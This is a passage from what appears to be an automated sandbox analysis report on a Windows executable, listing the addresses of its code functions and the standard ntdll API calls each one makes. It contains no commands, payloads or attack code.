                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726593D0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString,0_2_726593D0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726503DD RtlInitUnicodeString,ZwQueryValueKey,0_2_726503DD
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A3D0 ZwCreateKey,0_2_7268A3D0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267D3AC RtlFreeHeap,RtlWakeAddressAllNoFence,RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlpUnWaitCriticalSection,ZwSetEvent,0_2_7267D3AC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727043A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,0_2_727043A4
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D13B6 ZwCreateEvent,0_2_726D13B6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266C3BD RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,0_2_7266C3BD
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264A380 RtlCreateMemoryZone,ZwAllocateVirtualMemory,0_2_7264A380
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B390 ZwOpenKeyEx,0_2_7268B390
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72701071 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72701071
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72650070 RtlReportSilentProcessExit,memset,memset,RtlReportSilentProcessExit,ZwDuplicateObject,memset,memset,ZwWaitForSingleObject,ZwClose,ZwClose,0_2_72650070
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72705053 ZwProtectVirtualMemory,0_2_72705053
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72685040 TpCheckTerminateWorker,TpCheckTerminateWorker,ZwDuplicateObject,ZwQueryInformationThread,ZwQueryInformationThread,ZwClose,DbgPrintEx,memset,RtlRaiseException,TpCheckTerminateWorker,0_2_72685040
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266C04A RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection,0_2_7266C04A
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D6042 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,0_2_726D6042
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72717030 RtlCompressBuffer,memcpy,ZwWriteFile,memcpy,0_2_72717030
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72645020 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap,0_2_72645020
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72659001 RtlWow64EnableFsRedirectionEx,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlWow64EnableFsRedirectionEx,0_2_72659001
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268C000 ZwWow64IsProcessorFeaturePresent,0_2_7268C000
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72701008 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72701008
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726890EA memset,memset,ZwClose,0_2_726890EA
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727180F7 ZwAlpcSendWaitReceivePort,RtlFreeHeap,0_2_727180F7
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726570E9 RtlEqualUnicodeString,ZwMapViewOfSection,ZwUnmapViewOfSection,LdrQueryImageFileKeyOption,RtlAcquirePrivilege,RtlReleasePrivilege,0_2_726570E9
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266E0E8 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,0_2_7266E0E8
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726480C0 RtlUnlockMemoryZone,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwUnlockVirtualMemory,0_2_726480C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B0C0 ZwGetCurrentProcessorNumber,0_2_7268B0C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726540CC ZwQueryInformationToken,RtlFindAceByType,RtlFindAceByType,RtlFindAceByType,RtlAllocateHeap,memcpy,memcpy,memcpy,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlCreateSecurityDescriptor,RtlFreeHeap,RtlCreateAcl,RtlAddMandatoryAce,RtlFreeHeap,memcpy,RtlFreeHeap,RtlSidDominates,RtlFindAceByType,RtlCreateAcl,RtlAddProcessTrustLabelAce,RtlFreeHeap,ZwDuplicateToken,ZwAccessCheck,ZwClose,ZwPrivilegeCheck,ZwPrivilegeCheck,RtlFreeHeap,memset,memset,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,0_2_726540CC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267C0D7 RtlImageNtHeaderEx,ZwProtectVirtualMemory,0_2_7267C0D7
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726CA0DE ZwRaiseHardError,0_2_726CA0DE
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726490D0 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool,0_2_726490D0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727150CC ZwTraceControl,0_2_727150CC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727010CF RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727010CF
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726870AB ZwCancelWaitCompletionPacket,RtlDebugPrintTimes,0_2_726870AB
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B0A0 ZwGetCompleteWnfStateSubscription,0_2_7268B0A0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726770AF RtlInitializeCriticalSectionEx,ZwDelayExecution,0_2_726770AF
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72658080 RtlAcquireSRWLockExclusive,ZwProtectVirtualMemory,ZwProtectVirtualMemory,RtlReleaseSRWLockExclusive,0_2_72658080
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72647090 ZwClose,RtlFreeHeap,RtlFreeHeap,0_2_72647090
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B090 ZwGetCachedSigningLevel,0_2_7268B090
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72648160 RtlUnlockModuleSection,RtlAcquireSRWLockExclusive,ZwUnlockVirtualMemory,RtlFreeHeap,RtlReleaseSRWLockExclusive,0_2_72648160
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264516E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,0_2_7264516E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72715162 ZwClose,RtlWakeAllConditionVariable,0_2_72715162
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D5170 DbgPrompt,ZwWow64DebuggerCall,0_2_726D5170
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72701151 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72701151
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726CA146 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel,0_2_726CA146
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72658123 ZwProtectVirtualMemory,LdrControlFlowGuardEnforced,LdrControlFlowGuardEnforced,ZwProtectVirtualMemory,ZwProtectVirtualMemory,0_2_72658123
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266D121 RtlFreeHeap,ZwSetInformationThread,ZwSetInformationThread,ZwSetInformationObject,ZwClose,ZwSetInformationThread,0_2_7266D121
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B120 ZwGetNlsSectionPtr,0_2_7268B120
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D113A ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,0_2_726D113A
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264B101 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException,0_2_7264B101
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D6105 memset,memcpy,ZwTraceEvent,0_2_726D6105
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72677110 memset,RtlRandomEx,RtlRandomEx,ZwQueryInformationProcess,ZwQueryInformationProcess,0_2_72677110
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264411D RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess,0_2_7264411D
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726451E0 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,0_2_726451E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A1E0 ZwAccessCheck,0_2_7268A1E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266C1F6 ZwCreateFile,ZwCreateFile,0_2_7266C1F6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A1F0 ZwWorkerFactoryWorkerReady,0_2_7268A1F0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727011D2 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727011D2
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727151D5 RtlNtStatusToDosError,ZwWaitForSingleObject,ZwClose,0_2_727151D5
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267B1C0 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite,0_2_7267B1C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B1C0 ZwIsUILanguageComitted,0_2_7268B1C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727171DC ZwWriteFile,0_2_727171DC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726851C6 ZwOpenKey,ZwQueryValueKey,ZwClose,0_2_726851C6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726CA1AC ZwCompareSigningLevels,ZwCompareSigningLevels,0_2_726CA1AC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D11AC ZwOpenEvent,ZwWaitForSingleObject,ZwClose,0_2_726D11AC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267D1B7 RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlDebugPrintTimes,0_2_7267D1B7
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726DE1B3 ZwOpenThreadTokenEx,ZwOpenThreadTokenEx,0_2_726DE1B3
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B180 ZwInitializeNlsFiles,0_2_7268B180
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C7194 RtlAllocateHeap,memcpy,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlFreeHeap,0_2_726C7194
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726F3660 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,0_2_726F3660
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7271864B RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_7271864B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266C620 TpCallbackIndependent,ZwSetInformationWorkerFactory,TpCallbackIndependent,0_2_7266C620
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A620 ZwDuplicateToken,0_2_7268A620
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72719623 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72719623
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C660A RtlGetCurrentServiceSessionId,RtlAllocateHeap,memcpy,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlFreeHeap,0_2_726C660A
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A600 ZwOpenEvent,0_2_7268A600
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A610 ZwAdjustPrivilegesToken,0_2_7268A610
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264B61F RtlImageNtHeader,ZwQueryVirtualMemory,0_2_7264B61F
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726716E5 RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,0_2_726716E5
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C76FC ZwQueryVirtualMemory,0_2_726C76FC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A6C0 ZwApphelpCacheControl,0_2_7268A6C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726866D0 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,0_2_726866D0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726466A4 RtlInitUnicodeString,ZwQueryValueKey,0_2_726466A4
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726746A4 RtlRandomEx,ZwQueryInformationProcess,0_2_726746A4
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726F66A2 ZwSetInformationVirtualMemory,0_2_726F66A2
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726766B4 ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,0_2_726766B4
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726716B3 ZwClose,ZwClose,0_2_726716B3
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B6B0 ZwQueryLicenseValue,0_2_7268B6B0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727186A9 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727186A9
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D16B6 ZwQueryInformationProcess,0_2_726D16B6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264B680 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,0_2_7264B680
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D1689 ZwQueryInformationProcess,0_2_726D1689
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A680 ZwCreateEvent,0_2_7268A680
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B680 ZwQueryInstallUILanguage,0_2_7268B680
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7271469B ZwTraceControl,0_2_7271469B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7271969E RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_7271969E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A690 ZwQueryVolumeInformationFile,0_2_7268A690
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7265669E RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose,0_2_7265669E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726C3693 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,0_2_726C3693
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267F76C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString,0_2_7267F76C
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267D76B ZwWaitForAlertByThreadId,0_2_7267D76B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72647770 RtlAcquireResourceShared,RtlAcquireResourceShared,ZwWaitForSingleObject,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlRaiseStatus,0_2_72647770
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264A740 RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwDuplicateToken,ZwSetInformationThread,ZwClose,ZwClose,RtlImpersonateSelfEx,0_2_7264A740
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D174B ZwSetInformationProcess,0_2_726D174B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7270675E ZwAllocateVirtualMemoryEx,0_2_7270675E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72711746 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence,0_2_72711746
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A750 ZwCreateFile,0_2_7268A750
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FF752 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_726FF752
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B720 ZwQuerySecurityAttributesToken,0_2_7268B720
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A720 ZwResumeThread,0_2_7268A720
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D1724 ZwQueryInformationProcess,0_2_726D1724
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FF722 ZwQueryInformationProcess,RtlUniform,0_2_726FF722
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264D730 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose,0_2_7264D730
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A730 ZwTerminateThread,0_2_7268A730
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72672700 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,0_2_72672700
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A700 ZwProtectVirtualMemory,0_2_7268A700
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266B70C ZwSetInformationWorkerFactory,0_2_7266B70C
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7271870A RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_7271870A
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A7E0 ZwTraceEvent,0_2_7268A7E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B7E0 ZwRaiseException,0_2_7268B7E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FE7E6 memset,memset,memset,ZwQueryInstallUILanguage,ZwIsUILanguageComitted,RtlLCIDToCultureName,ZwQueryValueKey,RtlInitUnicodeString,RtlCompareUnicodeStrings,RtlInitUnicodeString,ZwQueryValueKey,ZwEnumerateValueKey,RtlCompareUnicodeStrings,RtlCompareUnicodeStrings,0_2_726FE7E6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FB7FA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,0_2_726FB7FA
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B7F0 ZwRaiseHardError,0_2_7268B7F0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A7F0 ZwPowerInformation,0_2_7268A7F0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727187ED RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727187ED
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266F7F9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose,0_2_7266F7F9
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B7C0 ZwQueryWnfStateNameInformation,0_2_7268B7C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A7C0 ZwSetInformationObject,0_2_7268A7C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FF7D3 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_726FF7D3
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D17AA ZwWaitForMultipleObjects,0_2_726D17AA
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A7B0 ZwWaitForMultipleObjects,0_2_7268A7B0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727007AD memset,ZwClose,ZwCreateSection,ZwMapViewOfSection,RtlDebugPrintTimes,ZwUnmapViewOfSection,ZwUnmapViewOfSection,ZwClose,0_2_727007AD
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72657781 ZwProtectVirtualMemory,0_2_72657781
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D1783 ZwQueryInformationThread,0_2_726D1783
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72665790 RtlNtStatusToDosError,RtlEnterCriticalSection,RtlNtStatusToDosError,RtlCompareMemoryUlong,DbgPrint,DbgPrint,DbgPrint,RtlpNotOwnerCriticalSection,memset,RtlFillMemoryUlong,RtlCompareMemoryUlong,DbgPrint,DbgPrint,DbgPrint,RtlFillMemoryUlong,RtlNtStatusToDosError,memset,RtlFillMemoryUlong,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,0_2_72665790
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B790 ZwQuerySystemInformationEx,0_2_7268B790
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7271878F RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_7271878F
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264E460 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey,0_2_7264E460
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7268A470 ZwSetInformationFile,0_2_7268A470
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7267547E ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,0_2_7267547E
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_72718452 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72718452
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7264B440 RtlDestroyMemoryZone,RtlAcquireSRWLockExclusive,ZwFreeVirtualMemory,0_2_7264B440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_72647440 RtlProtectHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlProtectHeap,ZwQueryVirtualMemory,0_2_72647440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_72642440 RtlDeleteTimerQueueEx,RtlAcquireSRWLockExclusive,TpTimerOutstandingCallbackCount,TpReleaseTimer,RtlDeleteTimerQueueEx,RtlDeleteTimerQueueEx,RtlDeleteTimerQueueEx,ZwWaitForAlertByThreadId,0_2_72642440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7268A440 ZwOpenThreadToken,0_2_7268A440
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7265044F ZwOpenKey,ZwClose,0_2_7265044F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_72688442 ZwAllocateVirtualMemory,memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,0_2_72688442
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7270145F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_7270145F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_72658457 RtlImageNtHeaderEx,ZwWow64IsProcessorFeaturePresent,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,0_2_72658457
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7267245F ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,0_2_7267245F
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7268A450 ZwQueryInformationThread,0_2_7268A450
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_72645420 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread,0_2_72645420
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7265A423 RtlEnterCriticalSection,RtlAllocateHeap,RtlLeaveCriticalSection,RtlReAllocateHeap,RtlLeaveCriticalSection,ZwProtectVirtualMemory,RtlLeaveCriticalSection,0_2_7265A423
Source: C:\Users\user\Desktop\y98WYYcJ2U.exe Code function: 0_2_7267242B ZwQueryVirtualMemory,0_2_7267242B
